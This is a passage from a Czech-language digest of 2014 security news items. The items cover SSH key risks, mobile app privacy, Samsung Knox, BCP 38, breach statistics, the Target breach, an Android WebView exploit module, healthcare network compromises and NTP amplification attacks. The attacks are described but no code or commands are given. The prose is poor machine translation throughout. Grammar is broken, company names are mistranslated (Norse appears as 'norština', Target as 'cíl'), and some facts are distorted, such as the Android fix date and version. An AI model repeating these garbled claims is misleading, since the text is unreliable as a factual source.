citlivých údajů je široce dostupný a velmi nechráněná, takže mnoho organizací otevřený věčným kybernetickým útokům a kompromisů. " "generální ředitelé, CIO, CISO a ostatní IT bezpečnost manažeři jsou tolerantní k bodu šílenství, pokud jde o kontrolu, ochranu a detekci SSH, nejpoužívanější zabezpečení a ověřování technologií mezi administrátory, servery, a mraky, "řekl Venafi CEO Jeff Hudson. "To je nebezpečná situace, podobný na což lišek klíče od slepice domů. Mají povoleno zabezpečení SSH na vymknout kontrole, což ve skutečnosti staví jejich organizace v ohrožení. Celková neschopnost reagovat na porušení otáčením všech SSH klíče znamená, CISO je třeba více investovat do buldozery jejich datových centrech než firewallů, "dodal Hudson.
400 iOS a Android aplikace analyzovány na rizika ochrany osobních údajů a bezpečnosti
28.2.2014 Mobil
Nová zpráva analyzuje chování top 400 iOS a Android aplikací pro posouzení stavu bezpečnosti mobilních app a identifikovat trendy ovlivňují spotřebitele a podniky s růstem BYOD a mobilní prvních pohybů. Appthority analyzovaných nejnovější seznam top 400 aplikace poskytované Apple a Google, a společnost ve srovnání s výsledky údajů ze zprávy o Appthority Summer 2013 poskytují širší vhled do vývoje app ekonomiky. "Mobilní aplikace přináší i obrovskou příležitost a obrovské riziko pro podniky a jejich zaměstnance," řekl Domingo Guerra, prezident a spoluzakladatel, Appthority. "Firmy vědí, že je nutné posílit jejich pracovní sílu využívat mobilitu a zároveň chrání citlivá a cenná firemní data. Vzhledem k tomu, BYOD rychle proměnila Bring Your Own aplikace, je nezbytné pro IT administrátory a bezpečnostní mít plný přehled a kontrolu nad mobilních aplikací, které stávající potenciál Bezpečnost a soukromí rizika ". 95% z top 200 volných iOS a Android apps vykazují alespoň jednu rizikového chování:
70% umožňují sledování polohy
69% umožnit přístup k sociálním sítím
56% identifikovat uživatele
53% jsou integrovány s reklamními sítěmi
51%, aby in-app nákupu
31% umožnit adresáře a seznamy kontaktů, které mají být přečíst.
S více než milion aplikací v Apple App Store a také v Google Play, app tituly uvedené v top 100 se neustále mění. Ve skutečnosti, podle Appthority v oblasti výzkumu 57% z top zdarma iOS aplikací pád z vrcholu 100 seznamu každých šest měsíců. Kromě změny app tituly, app verze jsou také pravidelně aktualizovány vytváří čistý novou aplikaci téměř každý měsíc. Z tohoto důvodu je analýza 100 nejlepších aplikací v daném okamžiku rychle zastará.
Samsung ohlásil mobilní firemní software Knox 2.0
28.2.2014 Mobil
Po představení nové verze smartphonu Galaxy S5 se snímačem otisků prstů představil Samsung druhou generace podnikového mobilního softwaru Knox. Ta podporuje funkce ovládání přístrojů Samsung, které budou uvedeny ve druhém čtvrtletí letošního roku.
Knox 2.0 poskytuje správcům IT možnost sledovat prostřednictvím cloudu všechna zařízení Samsung i služby v nich spuštěné a také aktivovat systém jednotného přihlášení pomocí zařízení Gear. Knox 2.0 byl ohlášen v rámci konference Mobile World Congress 2014 v Barceloně. Výrobce představil aktualizované tržiště aplikací Samsung Knox, které bude integrováno ve verzi Knox 2.0. V obchodu bylo doposud asi 150 podnikových aplikací přístupných koncovým uživatelům. V nové verzi se objeví také mobilní verze služeb Office 365 nebo Google Docs.
Stejně jako jiné nástroje MDM může Knox omezovat instalaci vlastních programů uživatelem. Společnost rovněž uvedla, že ve verzi 2.0 dojde k důkladnějšímu oddělení podnikových a soukromých aplikací, e-mailu a dalších služeb.
Aplikace Knox vytváří v mobilních zařízeních Samsung samostatnou oblast, která má svůj vlastní runtime, sadu programů a dat oddělené od soukromých programů konkrétního uživatele smartphonu nebo tabletu. Knox tedy umožňuje uživateli bezpečně sdílet osobní a firemní data a aplikace v rámci jednoho zařízení.
V nové verzi byla doplněna podpora řady dalších nástrojů MDM a EMM, pokud tyto produkty třetích stran pracují v nechráněné části zařízení. Mezi podporované produkty patří například Good, Mobile Iron nebo Fixmo.
Měsíční poplatek na používání cloudové služby Knox 2.0 je stanoven na 3,60 dolaru na uživatele.
Původní verze Knox byla uvedena v říjnu 2013 a v současnosti ji používá více než 1 milion uživatelů. Celkový počet stažených aplikací Knox přesahuje 25 milionů. Očekává se, že komplexní podpora Knox 2.0 bude k dispozici v nově představených přístrojích Galaxy S5 a Gear 2. Společnost ovšem letos chystá uvedení dalších modelů s podporou tohoto zabezpečení.
DDoS a BCP 38
27.2.2014 Počítačový útok
Docela často se v mnoha seznamech budeme slyšet termín Best Current Practice (BCP) 38 roznášeno a další doporučení k realizaci [1] [2] [3] [4] (viz nanog Mailing archiv seznam). Někteří budou říkat "to pomůže při zmírňování DDoS" a dokonce i ostatní budou ještě stát "Všichni poskytovatelé internetových služeb (ISP) by měla provádět toto." Teď před filozofické diskuse následovat v komentářích, mohlo by to být dobrý nápad, aby diskutovali, technicky , co to je? A možná to, co to může dělat?
BCP 38 AKA RFC 2267 [5] je metodika nejlepší praxe kolem vniknutím filtrování provozu. Specifický účel, jak je uvedeno v RFC abstraktně "zakázat DoS útoky, které používají padělané IP adresy, které mají být šířeny z" za "poskytovatele služeb Internetu je (ISP), agregace bodu". [5]
BCP 38 vymezuje pojem "omezení tranzitní dopravy", která pochází z "downstream sítě vědět, a vnitřně inzerované předpony" [5, str.4]. V příliš zjednodušené schéma (Můj výklad RFC, komentáře a opravách vítejte), znamená to, že ISP říká:
Dejte nám vědět, pokud užíváte nebo jste realizovány BCP38? Doporučujeme ji a pocit, že má technický význam a mohou pomoci snížit riziko!
Odkazy:
[1] https://isc.sans.edu/diary/A+Chargen-based+DDoS% 3F + chargen + je + stále + + věc% 3F/15647
[2] https://isc.sans.edu/diary/Disaster+Preparedness+-+Are+We+Shaken+or+Stirred% 3F/11431
[3] https://isc.sans.edu/forums/diary/Where+Were+You+During+the+Great+DDoS+Cybergeddon+of+2013+/15496
[4] https://isc.sans.edu/podcastdetail.html?id=3260
[5] http://tools.ietf.org/html/bcp38
800M vystavené záznamy, aby 2013 rekordní rok pro narušení dat
27.2.2014 Incidenty
Navzdory často opakované tvrzení, že insider hrozba je ta organizace by měly být díval se na, čísla a statistiky týkající se 2.013 narušení dat ukazují, že riziko je mnohem menší než ten v souvislosti s útoky přicházející z vnějšku. Risk Based Security a Open Nadace Security analyzoval čísla a podrobnosti 2164 ztráty dat incidentů hlášených v roce 2013, a dospěli k závěru, že 72 procent z těchto incidentů se podílejí mimo útočníků, a 25 procent zúčastněných zasvěcenci. Je také dobré vědět, že poruší zapojené zasvěcenci byly způsobeny více nehod a selhání lidského faktoru, než škodolibost. A zatímco počet případů incidentů ztráty dat v roce 2012 téměř o třetinu větší, že pro rok 2013, počet záznamů vystaven v roce 2013 porušení dosáhla rekordních 823 milionů. Většina úniků dat zasáhla podniky, následovaný vládou, zdravotnických a vzdělávacích institucí, a to by nemělo být zcela neočekávané, že drtivá většina z vystavených záznamů byla ukradena z podniků, jakož i:
Také by nemělo být překvapením, že 45,5 procenta z porušení hit organizace se sídlem v USA, a že ti, tvořily 66,5 procenta z napadených záznamů (jednotlivých států USA, Kalifornie vede seznam s asi 370 milionů záznamů vystaven) .
Je zajímavé, že Jižní Korea je druhým ze seznamu zemí, pokud jde o vystavených záznamů - některé 140 miliony e-mailů adresy a identifikační čísla byla ohrožena hack věřil být namontovány podle severokorejských hackerů proti dosud veřejně neznámých organizací. Tento útok je také třetí místo na seznamu nejlepších 10 narušení dat incidentů všech dob. Adobe hack vrcholy tohoto seznamu, pokud hack firemních systémech vystavených jména zákazníků, ID, šifrovaných hesel a čísel debetní / kreditní karty s datem vypršení platnosti, zdrojový kód a další informace týkající se objednávek zákazníků - to vše ve všech 152000000 záznamy byly ohroženy. Nedávná Target porušení je na pátém místě, a expozice údaje, které se stalo v důsledku chyby v Pinterest je API končí seznamu. Celkový počet vystavené záznamy v roce 2013 je tak velký, protože z těchto masivních porušení, ale to je zajímavé poznamenat, že o něco více než polovina hlášených incidentů vystaveny pouze mezi jedním až 1000 záznamů. také zajímavou statistiku: 260 z porušení zveřejněných v roce 2013 představoval Následné události pro ovlivnil organizaci, a šedesát organizací hlášeno několik incidentů během roku 2013. Pokud máte zájem o více informací a statistiky, doporučuji podívat se na velmi podrobnou zprávu .
Náklady na porušení dat Target převyšuje 200.000.000 dolar
27.2.2014 Kriminalita
Finanční instituce i nadále reagovat na masivní porušení dat na cíl . Podle údajů shromážděných spotřebitelů Bankers Association (CBA) a Credit Union National Association (CUNA) náklady spojené s porušením dat Target přesáhnout částku 200 milionů dolarů.
CBA odhaduje, že náklady na nahrazení karty pro své členy, aby dosáhly 172.000.000 dolarů, oproti počáteční zjištění z 153 milionů dolarů CUNA uvedla, že náklady na spořitelních a úvěrních družstev se zvýšil na 30,6 milionů dolarů z původní odhad ve výši 25 milionů dolarů. Zatím karty nahrazeny členy ČBA a spořitelních a úvěrních družstev tvoří více než polovinu všech postižených karet. Mezi členy CBA a CUNA, 21,8 milionů z 40 milionů napadených karet byly nahrazeny. To představuje 54,5 procenta z karet Target zjevil, aby mohla být ohrožena v důsledku porušení prosinci dat. "Finanční instituce všech velikostí byli agresivní při zajišťování jejich zákazníci jsou chráněny v reakci na narušení dat Target. Členy ČBA se aktivně vyměnit karty, zvýšené sledování podvodů úsilí a rozšíří call centra hodiny. Spotřebitelé by měli být jisti, naši členové jsou při každém kroku, aby se minimalizovalo dopad této masivní porušení, "řekl Richard Hunt, prezident a generální ředitel společnosti CBA. "Družstevní záložny jsou nahrazeny nebo nahradí 85% svých karet ovlivněna Target porušení bez nákladů na jejich členům, "řekl Bill Cheney, prezident a generální ředitel společnosti Cuna. "Kombinovaná 200.000.000dolar náklady nese výhradně bankami a družstevními záložnami ukazuje, do jaké míry se finanční instituce jít chránit své zákazníky a členy." kombinovaná 200.000.000dolar cena není faktor v nákladech na přístup k finančním institucím jiným než spořitelních a úvěrních družstev nebo členy CBA, ani to vzít v úvahu všechny podvodné aktivity, které by mohly došlo nebo může dojít v budoucnu. Podvodné aktivity by tlačit náklady na narušení dat Target pro průmysl mnohem vyšší, protože spotřebitelé by nenese odpovědnost.
70% Android zařízení citlivá na povolený vzdálený přístup využít
27.2.2014 Mobil
Nedávné vydání z Metasploit modul , který umožňuje útočníkům vzdáleně přistupovat ("get shell") na většině Android-běh zařízení je opět zvýšil velmi dobrou otázku: "Jak můžeme donutit dopravcům a prodejcům dodávat aktualizace zabezpečení pro uživatele v aktuální způsobem? " chyba je v WebView programovací rozhraní Androidu. Kromě dává útočníkům přístup k fotoaparátu zařízení "a systém souborů se přes něco tak snadné nastavit jako webovou stránku zaminované, to může být také započíst pomocí útoku Man-in-the-Middle dodat na trojanized aktualizace app což by pak umožnilo útočníkům přístup všechny věci, které aplikace sama o sobě má oprávnění k použití. Podle Ars Technica , zranitelnost v pochybnost byl zveřejněny v prosinci 2012, a Google (konečně!) pevně jej v listopadu 2013, kdy se uvolní Android 4.2. Tod Beardsley, technický vedoucí k Metasploit rámce, říká, že tato chyba zabezpečení je "docela velký problém", a 70 procent zařízení, tam jsou zranitelní, protože běží Android verze pod 4.2. "Ve zcela nepřekvapující kroucení, jsem udělal rychlý přehled telefonů jsou dnes k dispozici na no-smlouvy stojanu na několik halových obchodů, a každý ten, který jsem viděl byly vystaveny po vybalení z krabice, "řekl dodal . "A ano, to je tady v USA, ne nějaká vzdálená místa jako je Moskva, Rusko." "Doufám, že zveřejněním modul EZ-2-Use Metasploit, že ji zneužívá, můžeme snad tlačit některé dodavatele k zajištění že jedno-klikněte zranitelnosti, jako to nevydrží 93 + týdnů ve volné přírodě, "dodal. Není moc, že uživatelé mohou udělat, aby tento problém vyřešit, kromě otravovat jejich nosičů ve velkých počtech v naději, že aktualizace zabezpečení budou zveřejněny spíše dříve než později, doufám, že počítačoví zločinci se nespustí používat modul en masse, a být opatrní, na které spojuje klikněte na při používání jejich zařízení se systémem Android. Uživatelé zařízení, které pobírají jejich aktualizace operačního systému přímo od Google, jsou bezpečné , ačkoli.
Poučení z blokování 100 milionů kybernetických útoků
27.2.2014 Kriminalita
Použití reálných dat od 100 m + škodlivého hack pokusy FireHost blokovány v posledních 12 měsících, které vypracovala zprávu Troj, která obsahuje průvodce čtvrt po čtvrtletí do největších počítačové kriminality trendy a incidentů v roce 2013, včetně odborné analýzy z obou FireHost IT bezpečnostní týmy a partnery.
Klíčové celkové závěry a trendy pro rok 2013:
FireHost zablokoval více než 100 m kybernetických útoků v roce 2013
Cross-site scripting a SQL Injection jsou nejpopulárnější druhy útoků v roce 2013
Hackeři zahájil další útoky z komoditního mrak, než kdy předtím
Údaje FireHost naznačoval existenci "blackholing" efektu
Hlavní bezpečnostní incidenty, jako je například porušení dat Target snížil počet útoků na firemních webových aplikací.
Chris Drake, FireHost CEO a zakladatel, nastínil účel zprávy Troj FireHost je, "Kybernetické útoky mohou zdát jako náhodné incidenty v té době, ale když máte druh škodlivého útoku dat, které jsme vyvinuli v průběhu minulého roku, můžete začít korelovat tyto útoky trendy s 2013 největších narušení příběhy dat - z nichž bylo mnoho ". "FireHost je velmi úzce spolupracuje s ostatními vedoucími a inovativní praktiky v oblasti počítačové bezpečnosti komunity sledovat, dokumentů a blokovat útoky, jakmile jsme se s nimi setkají. To je jeden z hlavních důvodů pro výrobu čtvrtletní zprávu Troj. " rok XSS a SQL Injection první čtvrtletí roku 2013 udával tón pro to, co mělo přijít v příštích 12 měsících. Cross-Site Scripting je nejrozšířenější Superfecta Typ útoku v 1. čtvrtletí (s 1,2 m útoků zablokovaných), a bylo by tomu tak i nadále v průběhu celého roku, roste v popularitě velmi mírně každé čtvrtletí. SQL injection útoky budou následovat podobný trend, zvýšení objemu podstatně více než čtvrtiny jednoho, dvou a tří . obvykle výsadou pouze nejtalentovanějších hackerů, zvýšená popularita SQL Injection a možnost, že tyto útoky byly stává snadnější automatizaci byl důvod ke znepokojení. FireHost vydal ostrý upozornění na problematiku jako součást své Q3 zprávy Troj, kde SQL injection útoků zvýšil o téměř 100 tisíc ve srovnání s 2. čtvrtletím. V roce hackeři se obrátil na komoditní cloudu Během 2. čtvrtletí 2013 FireHost blokován téměř 24 milionů kybernetických útoků, včetně velké v počtu společných webových útoků procentní nárůst. Ve snaze odhalit příčinu za tímto trendem, bezpečnostní experti FireHost zjistil, že smíšené, automatizované útoky byly čím dál více používají v rámci cloud poskytovatelů služeb sítě. Ve skutečnosti je to podporováno tvrzení poskytovatele zabezpečení služby Solutionary, že cloud služby Amazon veřejné hostí více malwaru než jakýkoli jiný poskytovatel. V nedávné zprávě bezpečnosti IT, společnost navrhla, že poskytovatelé komodita oblačnosti že "dělal to úspornější pro nebezpečné herci využívat jejich služby infikovat miliony počítačů a obrovské množství podnikových systémů." generální ředitel a zakladatel FireHost, Chris Drake vysvětluje důvody za Tento znepokojující trend, "Počítačoví zločinci lze snadno nasadit a spravovat výkonné botnety, které běží na cloudové infrastruktury. Bohužel, mnoho poskytovatelů cloud dont dostatečně ověřit nové zákazníky sign-up, takže otevření účtů s falešnými informacemi je docela snadné. " 2013 je největší bezpečnostních IT incidentů Největší porušení dat incidentu v roce 2013 postihla americký maloobchod obr, terč, který vystavil údaje z tolik jako 110 milionů zákazníků - Důsledky, které se i nadále vyvíjet v letošním roce. Stejně jako blackholing účinku popsaného v Q4 Troj zprávě FireHost je, Tom Byrnes, ThreatSTOP generální ředitel, se domnívá, že se snížil počet útoků blokovaných FireHost v průběhu 4. čtvrtletí roku 2013 by mohlo být k té jediné porušení dat. "porušení údaje Cíl byl monumentální a je to Není divu, že to mělo vliv na údaje útoku FireHost je. Existuje jen několik set zločinecké gangy po celém světě běží tento druh počítačové kriminality provozu, takže akce jen málo z nich může signalizovat velký posun v průmyslu jako celku. Určitě jsme to viděli v sestavení až do období Vánoc a Cíl útoku. Během této doby, inteligentní hackeři mohou být ignorovány servery FireHost je úplně a zaměřila veškeré své úsilí na získání spotřebitelských dat během náročného on-line maloobchodní sezóny. Jiní by prostě byli příliš zaneprázdněni běží až poplatků na kreditních kartách cílových zákazníků "obtěžovat dělat něco jiného. "Byl to podobný případ v jaro / léto 2013. Počet útoků filtrovat podle IPRM služby FireHost dramaticky poklesl, a já bych se nedivil, kdyby to bylo, z části, kvůli velké IRS porušení dat. Organizovaní zločinci byli příliš zaneprázdněni chytnout identity a kradou miliardy dolarů v daňových náhrad se starat o cílení na firemní data, jako jsou aplikace hostované na infrastruktuře FireHost je. " Chris Hinkley CSSIP a senior bezpečnostní architekt na FireHost pokračoval, "to je zajímavé porovnat útoku trendy a útok zdroje s medializovaným informace o známých narušení dat a útoků. "Jako provozu od poněkud organizovaných zdrojů, např. botnety a dalších známých špatných IP, je výrazně vyšší, než je tomu u více obvyklých útoků DDoS stylu, to obvykle koreluje s hackery objevování nové využití nebo typ útoku, a široký zametací snaha najít vnímavé cíle. To může být velmi dobře byl případ s nedávným Target porušení. Je to vyšlo na světlo, že cíl porušení může pocházet pouze z jednoho koordinovaný útok, při kterém hackeři ohrožena několika obchodech. Co se lze naučit z toho je, že i když si nemyslím, že vaše firma bude čerpat přímé pozornost před hackery, můžete si být jisti, že je vysoká pravděpodobnost, že vaše servery jsou zjišťovány oportunní zločinci, kteří jsou neustále hledají tak snadné " Otevře se okno "dovnitř"
Epidemie kybernetických útoků kompromitujících zdravotnické organizace
27.2.2014 Kriminalita
Sítě a internet-připojený zařízení organizací v téměř každé kategorii zdravotnictví - z nemocnic na pojištění dopravců na farmaceutické společnosti - byly a nadále ohroženy úspěšných útoků. síť kompromis často vede k porušení dat, případně vystavit osobně identifikovatelné Informace o miliony spotřebitelů, jakož i vlastní duševního vlastnictví a fakturačních systémů organizace. Kromě toho, tyto napadené sítě umožňují zločinci použít síťovou infrastrukturu a zařízení, organizace, aby zahájily útoky na další sítě a provádět miliardy dolarů v hodnotě z podvodných transakcí. Nová zpráva SANS-skandinávské odhaluje mnoho poznatků a charakteristické závěry. Mezi nejvíce znepokojující byly následující:
49917 jedinečné události škodlivého charakteru se konala v rámci zdravotnického IT prostředí v době, kdy byla inteligence sešli, to byl malý vzorek dat shromážděných během tohoto období.
Sítě a zařízení na 375 US-založené organizace zdravotní péče v souvislosti byly ohroženy během tohoto období, a některé z nich jsou stále ohrožena.
Ohrožena zařízení včetně vše z radiologie zobrazovací software, firewally, na webových kamer, na poštovních serverech.
Nejčastěji napadené systémy byly VPN, které představovaly více než 30 procent všech napadených připojených zjištěných koncových bodů.
"Tato úroveň kompromisu a řízení by mohlo snadno vést k širokému spektru trestné činnosti, které jsou v současné době nejsou zjištěny. Například, mohou hackeři zapojit do rozsáhlé krádeže informací o pacientech, která zahrnuje vše od zdravotních podmínek na čísla sociálního zabezpečení na domácí adresy, a mohou dokonce manipulovat zdravotnické prostředky používané ke správě kritické péče, "řekl Filkins. "Pro mnoho organizací, které se řídí přísnými předpisy, jako je například zdravotní pojištění Přenosnost a odpovědnost Act (HIPAA), kompromisy a porušení vede k masivní pokuty. V roce 2013, pokuty v rozmezí od 150.000 dolar a šel až na 1,7 milionů dolarů v široce propagoval Wellpoint případě. " norština identifikované napadené zařízení a sítí s její globální ohrožení zpravodajské infrastrukturu, síť více než šest milionů senzorů a lákadla nové generace, se nachází v 38 globálních datových center a 20 velkých internetových výměny. Když napadené organizace vycházejí škodlivý provoz IP, infrastruktura jej rozpozná a okamžitě sleduje ji zpět vlastníkovi. široká škála organizací vyzařoval škodlivý IP provoz, mnoho z nich po celé měsíce a někteří po celou dobu trvání studie - to znamená, že nikdy zjištěn jejich kompromisy a odchozí nebezpečné komunikace. Nejen, že to bylo problematické pro cíl útoku, ale otevřený útok povrch otevřel dveře k útokům na jiné organizace. Ačkoli mnoho typů organizací byly ohroženy, jeden druh produkoval většinu škodlivého provozu:
Zdravotnictví Poskytovatelé - 72 procent škodlivého provozu
Zdravotnictví Obchodní partneři - 9,9 procent škodlivého provozu
Zdravotní plány - 6,1 procent škodlivého provozu
Zdravotnictví clearinghouses - 0,5 procent škodlivého provozu
Farmaceutické - 2,9 procent škodlivého provozu
Další související zdravotní péče osoby - 8,5 procent škodlivého provozu.
Přestože drtivá většina napadených zdravotnické organizace se vztahují předpisy, jako je HIPAA a HITECH, je stejně důležité poukázat na to, že pokračující útoky a kompromisy kladou značnou finanční zátěž na pacienty. Cybercrimes jako krádež identity, odcizení informací a podvody umístit nejen extrémní nepohodlí pro jednotlivce, ale také řídit další výdaje na zdravotní péči, které pacienti nemusí být možné obnovit. Zatímco většina spotřebitelů jsou chráněna proti krádeži a podvodu výdajů e-commerce související, které jsou odpovědné za náklady spojené s oslabeným insurance záznamů lékařských a souborů -. Náklady, které dosáhl 12 miliard dolarů v roce 2013 : "Co SANS a skandinávské objevili v této zprávě je, v slovo, alarmující, "uvedl Sam Glines, generální ředitel společnosti norštiny. "Prostý počet útoků byl spáchán proti zdravotnické organizace je ohromující, zatímco obrana na místě nejsou zdaleka nestačí k jejich neutralizaci. Takže i když zdravotnictví průmysl nadále hledat způsoby, jak chránit svá data, mnoho organizací stále ještě nejsou schopny správně chránit kritická data, a obě společnosti a spotřebitelé zaplatí cenu. "
Americké podniky utrpěly 666000 interních porušení bezpečnosti
27.2.2014 incidenty
Přes 666.000 vnitřní narušení bezpečnosti se konal v amerických podnicích v posledních 12 měsících, v průměru 2560 za každý pracovní den, nový výzkum odhalil. Zjištění, které se projevily IS rozhodnutí, také zjistil, že i přes tuto pravidelného výskytu, pouze 17,5% IT manažerů považují zasvěcených hrozby se ve svých prvních třech bezpečnostních priorit.
Nová zpráva upozorňuje na problematiku vnitřní bezpečnosti jako větší výzvu pro větší organizace, s 40% podniků s více než 500 zaměstnanců, kteří měli vnitřní narušení bezpečnosti v loňském roce. To také porovnává výskyt a odborník v oblasti IT je postoj k insider hrozby UK, kde byl trend opakoval jen s 21% vyjadřovat znepokojení navzdory více než 300.000 interních bezpečnostních incidentů v loňském roce. Insider hrozby nadále být relativně nízkou prioritou pro IT profesionály, s výzkumem zjištění problému je přetrumfnuti obavy hrozby virů (67%), ztráty dat (47%) a hackování (39%). Přesto čísla naznačují, že největším zdrojem ztráty dat je ve skutečnosti od zaměstnanců, což znamená, že IT odborníci jsou negovat podívat se na své vlastní vnitřní struktury dostatečně vážně řešit své vlastní problémy. Francois Amigorena, generální ředitel IS rozhodnutí komentoval: "Je lidská přirozenost vidět z externích zdrojů jako největší hrozbu, a že spolu s tím, že insider hrozba je složitý problém zvládnout vedlo k odborníkům v oblasti IT zdánlivě tolerovaly k této otázce. "Tato čísla, a vlivu, který Edward Snowden případ měl minulý rok, jasně ukazují, že vnitřní bezpečnost by měla být výš pořadu IT. Skutečností je, že to je velmi závažným problémem, ale dobrá zpráva je, že tam je hodně, že IT oddělení může udělat pro zmírnění rizika. Je to otázka techniky, stejně jako kulturní jeden, a mohou být řešeny z obou těchto úhlů.
Silná autentizace pro cloudové aplikace z Duo Security
27.2.2014 Bezpečnost
Duo Security rozšiřuje své bezpečnostní platformy, které pomohou zákazníkům chránit přístup k jejich citlivých dat uložených v cloudových aplikací, včetně Salesforce, Google Apps, Microsoft Office 365 a Box.
Podle analytiků společnosti Forrester, bezpečnost přetrvává jako hlavní inhibitor pro organizace, které uvažují cloud přijetí:. 73% hardwarových s rozhodovací pravomocí v oblasti IT zůstávají obavy o bezpečnost veřejný cloud v roce 2013 "Rozhodně jsme vidět ekonomických a manažerských výhod cloudu, ale my jen bude využít jich, jestli můžeme tak učinit bezpečně, "řekl Mark Maher, ředitel Corporate infrastruktury a technologie na New World Systems. "Prosazování silné autentizace umožňuje společnostem, jako je ta naše zachovat kontrolu nad tím, posilující přístup k majetku společnosti, bez ohledu na to, kde se hostitelem, v prostorách nebo v cloudu. Používáme Duo Security chránit přístup do naší sítě VPN a Salesforce." Ověřování platforma Duo Security dvou-faktor je navržen pro integraci s rozlehlou škálu aplikací, zařízení a služeb, které poskytují ochranu pověření uživatele. Pro řešení vyvíjející se povahy hybridních modelů IT, Duo rozšířila podporu na ochranu široce využívány, aplikace produktivity cloud-based a on-line služby, skladování. "K dnešnímu dni jsme se zaměřili na poskytování zákazníkům řešení dvoufaktorové autentizace, která je nejen snadné, ale také dost, aby splňovaly stále se měnící potřeby organizací, velkých i malých flexibilní, "řekl Richard Li. "Kritickým aspektem této flexibility je zajistit, aby naše řešení je schopen poskytnout organizacím bezpečný přístup ke klíčovým IT aktiv, které řídí jejich podnikání. Pomocí cloud přijetí nabírá na obrátkách, toto rozšíření našeho řešení platformy je důležitý pokrok v poskytování našim zákazníkům jediný bod ochrany, kterou vyžadují. " Poznejte lidi z Duo a dozvědět se více o této nejnovější verzi na konferenci RSA 2014 , 24. února - 28.. Duo Security budou umístěny na Expo v stánku # 2518, South Hall.
"Nigerijské" slib: naše sliby - vaše peníze
27.2.2014 Spam
Příběhy točil podle nigerijských podvodníci často ohromí jejich schopnost využívat a přizpůsobovat stejný typ podvodu na celé řadě situací. Většina z těchto situací jsou tragické, ať už souvisí s něčí smrti nebo politické vřavy. To je důvod, proč pokus dát pryč něčí peníze (nebo velkou část z toho), jako slib Bohu, může také přijít jako naprosté překvapení.
Slib byl dán inženýra, který se rozhodl rozdat desítky tisíc dolarů, aby náhodně vybraného uživatele od Internetu. Podle jeho příběhu, on podepsal velmi lukrativní smlouvu v Austrálii, ale po ukončení jeho část zakázky, jeho práce nebyla vyplacena. Zoufalý inženýr přísahal Bohu dát pryč 250,000 dolarů na nějaké náhodné osoby, pokud získal své peníze. Samozřejmě, že příběh měl šťastný konec, a v poslední době, australská vláda souhlasila, že zaplatí. A teď šťastný, inženýr musí splnit svůj slib, a je připraven poskytnout 250.000dolar na štěstí příjemci.
Přestože Google potvrzuje existenci pana Bradyho společnosti, příslib velké sumy peněz by neměly být brány příliš vážně. Podezření by měly být okamžitě zvýšena tím, že soukromý podnikatel psaní z adresy s fbi.gov domény.
Doufáme, že nikdo skončí reagovat a platit za pana Bradyho svatý slib. Koneckonců, šťastný konec pro podvodníky často vysvětluje tragédii pro oběti.
Kaspersky: Mobilní malware se stává podnikáním
27.2.2014 Viry | Mobil
Mobilní malware zažívá prudký vzestup. Jak prudký? Bezpečnostní společnost Kaspersky za minulý rok zaznamenala více než 143 tisíc nových modifikací zákeřných programů, jež se zaměřují právě na mobilní zařízení.
Ve stejném roce bylo k šíření malwaru použito 3,9 milionů instalačních balíčků. „Můžeme s jistotou říct, že kyberzločinec už nadále není osamělým jedincem, ale je součástí propracované obchodní operace,“ zmínila společnost na svém blogu. „Už je celkem jasné, že se vyvinulo celé odvětví, jež se soustředí pouze na zisk, což je z funkcí malwaru celkem zřejmé.“
Data společnosti Kaspersky naznačují, že 98 % veškerého mobilního malwaru v roce 2013 bylo zaměřeno na zařízení operačním systémem Android. Toto zjištění je podporováno i novým výzkumem společnosti Cisco.
„Odvětví mobilního malwaru se stále více zaměřuje na efektivnější vydělávání, to znamená převážně na phishing, krádeže údajů o platebních kartách a převod peněz z bankovních karet na mobilní zařízení a z mobilního zařízení do elektronických peněženek zločinců,“ vysvětluje Kaspersky.
„Kyberzločinci se stali touto metodou nelegálního získávání peněz posedlí. Na začátku roku jsme věděli o 67 bankovních trojských koních. Na konci loňského roku už bylo unikátních vzorků takových aplikací 1321.“
Momentálně většina těchto trojských koní ovlivňuje především uživatele z Ruska, kde se odehrává 40,3 % mobilního kyberzločinu. Kaspersky však upozorňuje, že ani lidé z jiných zemí by svou bezpečnost neměli brát na lehkou váhu. „Očekáváme, že mobilní kyberzločin v roce 2014 poroste i v ostatních zemích,“ upozornila společnost.
Nejznámější případy těchto trojských koní jsou třeba Svpeng, který se šíří přes textové zprávy a snaží se ukrást peníze z bankovních účtů. Dále Perkele, malware, který k šíření používá QR kódy, nebo Wroba, jenž nahrazuje bankovní aplikaci na zařízení a krade přihlašovací údaje.
Probíhající NTP amplifikace Útoky
26.2.2014 Počítačový útok
Brett, který nás upozornil na začátku tohoto měsíce, pokud jde o hmotnost využít proti Linksys zařízení se vynořil aktuální problém, že se směrem s probíhajícími zesílení útoků NTP. Dobrý US-CERT shrnutí útoku je zde: https://www.us-cert.gov/ncas/alerts/TA14-013A . Brett znamená, že:
"Jsme svědky masivní útoky na naše servery NTP, pokouší se zneužít zesílení provozu zranitelnosti oznámené minulý měsíc Naše IP adresy jsou zjišťovány adresu v Nizozemsku, a pár z nich -., Ve kterém byly unpatched servery objeveny - jsou byl zasažen asi 3 miliony zfalšovaných paketů za hodinu. (My jsme od opravenou a firewallem zranitelné servery, ale pakety stále přicházejí.) Falešná pakety jsou vyrobeny tak, že se zdají být původní převážně z portu 53 a 80, ale občas mají jiné čísla portů, například 3074 (Xbox) a 6667 (IRC). Jedná se o velmi závažný útok na nás, a já bych ocenil nějakou pomoc při upozorní lidi na to. "
On také poslal po 8 sekund zachycování paketů, které jsem vizualizací, jak je vidět níže.
NTP zesílení útoku
Podle Bretta, budou lidé dostávají podobnou návštěvnost vidět mnoho "monitor" dotazy z zfalšovaných zdrojových adres a portů. Jeho ISP je příjem zhruba 3 miliony těchto paketů každou hodinu, zaměřený na 3 IP adresy, které patřily k FreeBSD serverech, které byly ohroženy v jejich výchozích sestav, serverů, které byly nyní záplaty a firewallem. Připomíná nám, že i když byla použita Projekt FreeBSD patch, zranitelný server bude i nadále reagovat na dotazy se stejným počtem odmítnutí paketů. Zatímco oprava eliminuje zesílení provozu, provoz je stále opakoval, a jeho původ je dále zakryta.
Brettův ISP je také vidět sondy jejich IP hledají další zranitelné servery pocházející z IP adresy 93.174.95.119 (NL) ", které mohou být Server řízen osobou (osobami) za napadení. Sondy vyniknout, protože jsou hlášeny tcpdump jako NTPv2, zatímco většina ostatních dopravy je NTPv3 nebo NTPv4. Úroveň 3 byl zřejmě problémy s přetížením včera a dnes, a to může být důvod, proč. "
Geografické hesla jako řešení problému heslo
26.2.2014 Šifrování
